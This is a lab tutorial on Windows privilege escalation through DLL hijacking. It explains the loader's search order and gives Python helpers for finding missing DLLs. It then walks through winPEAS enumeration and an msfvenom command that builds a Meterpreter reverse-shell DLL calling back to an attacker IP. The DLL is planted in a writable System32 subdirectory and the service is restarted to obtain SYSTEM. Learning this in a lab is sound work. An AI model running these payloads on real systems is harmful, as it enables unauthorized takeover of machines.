Windows PrivEsc(2) — Hijacking DLLs

Clement 'Tino
5 min readAug 10, 2022


This is the second post in the Windows PrivEsc series. You can read the first one, which covers Unquoted Service Paths.

DLL Hijacking

Dynamic Link Libraries (DLLs)

What are Application DLLs?

DLLs are shared libraries that an application or service loads, either at start-up or on demand, to get code it does not carry in its own binary.

When a program asks for a DLL by name only, the loader walks a fixed list of directories to find it. If the DLL is missing, or if a directory we can write to is searched before the one that actually holds it, we can drop a DLL of the same name there and the program loads ours instead of the real one. When the loading process runs with higher privileges than we have, for example a service running as SYSTEM, our code runs with those privileges. This is DLL hijacking.

With SafeDllSearchMode enabled (the default), a DLL requested by bare name is searched for in this order:

1. The directory the application was loaded from
2. C:\Windows\System32
3. C:\Windows\System (the 16-bit system directory)
4. C:\Windows
5. The current working directory of the process
6. The directories listed in the PATH environment variable, left to right

Two things narrow this down. Names on the KnownDLLs list (ntdll.dll, kernel32.dll and the like) are always taken from System32 and never searched for on disk, so they cannot be hijacked this way. And a directory only helps us if our current user can write to it, which on a default install rules out System32 and the Windows directory; the interesting cases are an application directory with loose permissions or a PATH entry that is writable.


A DLL loaded by its fully qualified path is not searched for at all: the loader opens exactly that file, so hijacking it would need write access to that one location. Below is an example of a fully qualified path to a service's DLL.

PATH = C:\Windows\System32\example.dll

A DLL referenced by bare name, as below, goes through the search order and is the kind we can exploit.

PATH = example.dll
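To make the search-order rule concrete, here is an added example of my own (not code from the original post or from the lab script) that models it: given where a binary lives, the working directory of the process, PATH, and a constructed snapshot of which files exist and which directories the current user can write to, it reports where a requested DLL would be loaded from and which writable directory gets probed first. The file list, the writable directories, the KnownDLLs subset and the service paths are assumptions for the demo, not read from a real machine.

```python
"""Model of the Windows DLL search order (SafeDllSearchMode on).

Added example, not code from the original post or its lab script.
Everything below that looks like a filesystem is a constructed snapshot.
"""
import ntpath
from dataclasses import dataclass, field
from typing import List, Optional

# Subset (assumed) of HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\KnownDLLs.
# These names are mapped from the \KnownDlls section and never searched for on disk.
KNOWN_DLLS = {"ntdll.dll", "kernel32.dll", "kernelbase.dll", "advapi32.dll", "user32.dll"}


def search_order(app_dir: str, cwd: str, path_env: str, windir: str = r"C:\Windows") -> List[str]:
    """Directories the loader probes, in order, for a DLL given by bare name."""
    order = [
        app_dir,                              # 1. directory the executable was loaded from
        ntpath.join(windir, "System32"),      # 2. system directory
        ntpath.join(windir, "System"),        # 3. 16-bit system directory
        windir,                               # 4. Windows directory
        cwd,                                  # 5. current working directory (System32 for services)
    ]
    order += [p for p in path_env.split(";") if p]   # 6. PATH entries, left to right
    return order


@dataclass
class Resolution:
    requested: str
    loaded_from: Optional[str]                           # where the loader ends up, None if missing
    plant_in: List[str] = field(default_factory=list)    # writable dirs probed up to that point
    reason: str = ""

    @property
    def hijackable(self) -> bool:
        return bool(self.plant_in)


def resolve(dll: str, order: List[str], existing_files, writable_dirs,
            known_dlls=KNOWN_DLLS) -> Resolution:
    """Decide where `dll` loads from and where a same-named file would pre-empt it."""
    name = dll.lower()                                   # NTFS lookups are case-insensitive
    existing = {p.lower() for p in existing_files}
    writable = {d.lower().rstrip("\\") for d in writable_dirs}

    if ntpath.isabs(name):                               # fully qualified: no search at all
        d = ntpath.dirname(name)
        return Resolution(dll, dll if name in existing else None,
                          [ntpath.dirname(dll)] if d in writable else [],
                          "absolute path, only that one directory matters")

    if ntpath.basename(name) in known_dlls:              # KnownDLLs short-circuit the search
        return Resolution(dll, "\\KnownDlls\\" + name, [], "KnownDLL, never searched for on disk")

    plant: List[str] = []
    for d in order:
        d_norm = d.lower().rstrip("\\")
        if d_norm in writable:                           # a file we drop here wins over anything later
            plant.append(d)
        if ntpath.join(d_norm, name) in existing:
            return Resolution(dll, ntpath.join(d, ntpath.basename(dll)), plant,
                              "found in search order")
    return Resolution(dll, None, plant, "missing everywhere: any writable directory on the list works")


def demo() -> dict:
    """Constructed lab snapshot mirroring the post's dllsvc scenario (assumed, not measured)."""
    order = search_order(
        app_dir=r"C:\Program Files\DLL Hijack Service",
        cwd=r"C:\Windows\System32",                       # services start in System32
        path_env=r"C:\Windows\System32;C:\Windows;C:\Windows\System32\wbem;C:\Temp",
    )
    existing = {
        r"C:\Program Files\DLL Hijack Service\dllhijackservice.exe",
        r"C:\Program Files\DLL Hijack Service\helper.dll",
        r"C:\Windows\System32\kernel32.dll",
        r"C:\Windows\System32\example.dll",
        r"C:\Temp\late.dll",
    }
    writable = {r"C:\Windows\System32\wbem", r"C:\Temp"}   # assumed loose ACLs
    requests = ["hijackme.dll", "kernel32.dll", "helper.dll",
                r"C:\Windows\System32\example.dll", "late.dll"]
    return {r: resolve(r, order, existing, writable) for r in requests}


if __name__ == "__main__":
    for req, res in demo().items():
        where = res.loaded_from or "<not found>"
        print(f"{req:40} -> {where:50} hijackable={res.hijackable} via {res.plant_in}")
```

The late.dll case is the one worth noticing: the DLL does exist, but in C:\Temp, which sits after the writable wbem directory in PATH, so a copy planted in wbem is what the loader picks up. On a real target the existing-file and writable sets come from the filesystem (icacls, or simply trying to create a file in each directory).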

To set up and practise this, you need:

  • Windows 7 SP1 x64, build 7601
  • The batch script from here. It is a local privilege escalation lab script that installs a number of deliberately vulnerable services on the virtual machine.

Transfer the script to the virtual machine and run it as Administrator. Restart when cmd prompts you to, once the services have been installed.

Now open cmd on the Windows 7 VM and start the DLL hijacking service:

sc start dllsvc

To check that the service is really running:

sc query dllsvc

Now we are good to go

Exploitation Process

I'm assuming you already have a foothold on the Windows 7 machine (either a Meterpreter session or a cmd shell).

To start, we can't just assume the target is vulnerable to DLL hijacking; some enumeration is needed to find out whether it is. Here we use the Windows Privilege Escalation Awesome Scripts (winPEAS). You can clone it from GitHub here. After cloning, upload the winPEASx64.exe binary to the target, either with Meterpreter's upload command or by serving it from a simple Python HTTP server and fetching it with certutil.exe on the Windows side.

Over here I have it uploaded into my Downloads folder

Now launch it with the servicesinfo argument to enumerate the services, including any that load a DLL that cannot be found, together with the paths involved:

.\winPEASx64.exe servicesinfo

Reading winPEAS's output, one entry stands out: the DLL Hijack Service, backed by the dllhijackservice.exe binary. The DLL this executable asks for is referenced by name only and is not present where the loader looks, so we can supply our own DLL under that name and have the service load it.

VIA GUI ALTERNATIVE

Using Process Monitor to find services vulnerable to DLL hijacking.

If your foothold is an RDP session you can skip winPEAS and use Sysinternals Process Monitor instead. It records every file the service tries to open, so with the right filters it shows which DLL the binary asks for and which directories it probes, in search order.

Upload Procmon.exe to the Windows target and launch it.

Click on the funnel icon to open the Filter dialog.

Add a filter for the service binary (Process Name is dllhijackservice.exe) and click Add.

Add a second filter for failed lookups (Result is NAME NOT FOUND) and click Add again. A third filter, Path ends with .dll, keeps the list to libraries. Also watch for the PATH NOT FOUND result, which Procmon reports when a directory in the search order does not exist at all; it means the loader moved on just the same.

Click Apply, then restart the service so the loader runs through the search order while Procmon is capturing.

Procmon now lists the DLLs dllhijackservice.exe asked for and could not find, one line per directory it tried. Any directory on that list that your user can write to is where the payload goes.
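Procmon can also save its capture as CSV (File > Save, CSV format), and the same triage can then be done offline. Here is an added example, my own and not from the original post, that reads such an export and groups the failed DLL opens by process and file name, in the order the loader probed them, which is the search order made visible. The CSV text is constructed for the demo to resemble a Procmon export with its default columns; the service and DLL names follow the lab, and the Detail values are shortened.

```python
"""Pick DLL-search failures out of a Process Monitor CSV export.

Added example, not from the original post. SAMPLE_CSV is constructed to
look like a Procmon export with its default columns. Equivalent Procmon
filters: Process Name is dllhijackservice.exe, Result is NAME NOT FOUND,
Path ends with .dll.
"""
import csv
import io
import ntpath
from collections import OrderedDict
from typing import List, Optional, Tuple

# NAME NOT FOUND: the file is missing. PATH NOT FOUND: a directory on the way
# to it does not exist (C:\Windows\System on a clean install, for instance).
# Both mean the loader moved on to the next directory, so both are kept.
MISSING = {"NAME NOT FOUND", "PATH NOT FOUND"}

SAMPLE_CSV = r'''"Time of Day","Process Name","PID","Operation","Path","Result","Detail"
"10:01:02.1000000 AM","dllhijackservice.exe","1234","CreateFile","C:\Program Files\DLL Hijack Service\hijackme.dll","NAME NOT FOUND","Desired Access: Read Attributes, Disposition: Open"
"10:01:02.1000100 AM","dllhijackservice.exe","1234","CreateFile","C:\Windows\System32\hijackme.dll","NAME NOT FOUND","Desired Access: Read Attributes, Disposition: Open"
"10:01:02.1000200 AM","dllhijackservice.exe","1234","CreateFile","C:\Windows\System\hijackme.dll","PATH NOT FOUND","Desired Access: Read Attributes, Disposition: Open"
"10:01:02.1000300 AM","dllhijackservice.exe","1234","CreateFile","C:\Windows\hijackme.dll","NAME NOT FOUND","Desired Access: Read Attributes, Disposition: Open"
"10:01:02.1000400 AM","dllhijackservice.exe","1234","CreateFile","C:\Windows\System32\wbem\hijackme.dll","NAME NOT FOUND","Desired Access: Read Attributes, Disposition: Open"
"10:01:02.1000500 AM","dllhijackservice.exe","1234","CreateFile","C:\Windows\System32\kernel32.dll","SUCCESS","Desired Access: Read Attributes, Disposition: Open"
"10:01:02.1000600 AM","svchost.exe","800","CreateFile","C:\Windows\System32\config\missing.txt","NAME NOT FOUND","Desired Access: Generic Read, Disposition: Open"
"10:01:02.1000700 AM","explorer.exe","2100","CreateFile","C:\Users\bob\AppData\Local\Temp\version.dll","NAME NOT FOUND","Desired Access: Read Attributes, Disposition: Open"
'''

Key = Tuple[str, str]   # (process name, dll file name), both lower-cased


def find_missing_dlls(csv_text: str, process: Optional[str] = None) -> "OrderedDict[Key, List[str]]":
    """Map (process, dll) -> the full paths probed for it, in capture order."""
    wanted = process.lower() if process else None
    hits: "OrderedDict[Key, List[str]]" = OrderedDict()
    for row in csv.DictReader(io.StringIO(csv_text)):
        proc = row["Process Name"].lower()
        path = row["Path"]
        if wanted and proc != wanted:
            continue
        # Operation is deliberately not filtered: older Procmon versions label
        # the same event IRP_MJ_CREATE rather than CreateFile.
        if row["Result"] not in MISSING or not path.lower().endswith(".dll"):
            continue
        hits.setdefault((proc, ntpath.basename(path).lower()), []).append(path)
    return hits


def probe_dirs(paths: List[str]) -> List[str]:
    """Directories the loader tried, in order: the observed search order."""
    return [ntpath.dirname(p) for p in paths]


if __name__ == "__main__":
    for (proc, dll), paths in find_missing_dlls(SAMPLE_CSV).items():
        print(f"{proc} could not find {dll}; directories probed, in order:")
        for d in probe_dirs(paths):
            print("   ", d)
```

The output for dllhijackservice.exe is the list from the search-order section with the lab's paths filled in; the last entry, C:\Windows\System32\wbem, is the PATH directory the post plants the payload in. Running without a process filter surfaces every process with the same weakness, which is useful on a target you have not enumerated yet.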

Now that I have shown two ways to find a service with a hijackable DLL, let's move on to generating our own DLL.

Creating a dll payload

I'm going to create the DLL payload with msfvenom and name it hijackme.dll, then serve it from a simple Python HTTP server (or push it through the Meterpreter session).

NB: The file name must be exactly the one dllhijackservice.exe asks for, and the DLL must match the architecture of the process that loads it: a 64-bit service needs an x64 DLL, which is why the payload below is windows/x64.

msfvenom -p windows/x64/meterpreter/reverse_tcp -f dll LHOST=192.168.1.100 LPORT=6161 -o hijackme.dll

After generating the DLL, we transfer it to the target into a directory that the service searches before it gives up and that our current user can write to. In this lab that directory is the following (confirm it is writable with icacls before uploading; if it is not, a different entry from the search order, such as another writable PATH directory, is the alternative):

C:\Windows\System32\wbem

I’m gonna navigate to that location in my first shell.

And upload the dll payload there.

upload /<PATH TO DLL>/hijackme.dll

Now set up the listener in Metasploit (exploit/multi/handler) with the same payload, LHOST and LPORT you used for msfvenom. Run it and wait: the shell arrives when the dllsvc service is restarted and loads our DLL.

Now in your foothold session, restart the dllsvc service:

sc stop dllsvc
sc start dllsvc

You'll catch a reverse shell in your listener running as NT AUTHORITY\SYSTEM, because the service process, not your low-privileged one, executed the DLL.

Two things to keep in mind outside the lab. Stopping and starting a service needs the corresponding rights in that service's security descriptor (check with sc sdshow or accesschk); when you don't have them, the hijack fires at the next reboot or the next time the service starts on its own. And a payload that runs inside DllMain can keep the service binary from reporting to the Service Control Manager, which then kills the process after its start timeout, so migrate the Meterpreter session to another process as soon as it connects.

We have been able to elevate our privileges by identifying a DLL the service could not find and planting our own DLL under that name in a writable directory on its search path, which gave us a SYSTEM-level Meterpreter session.
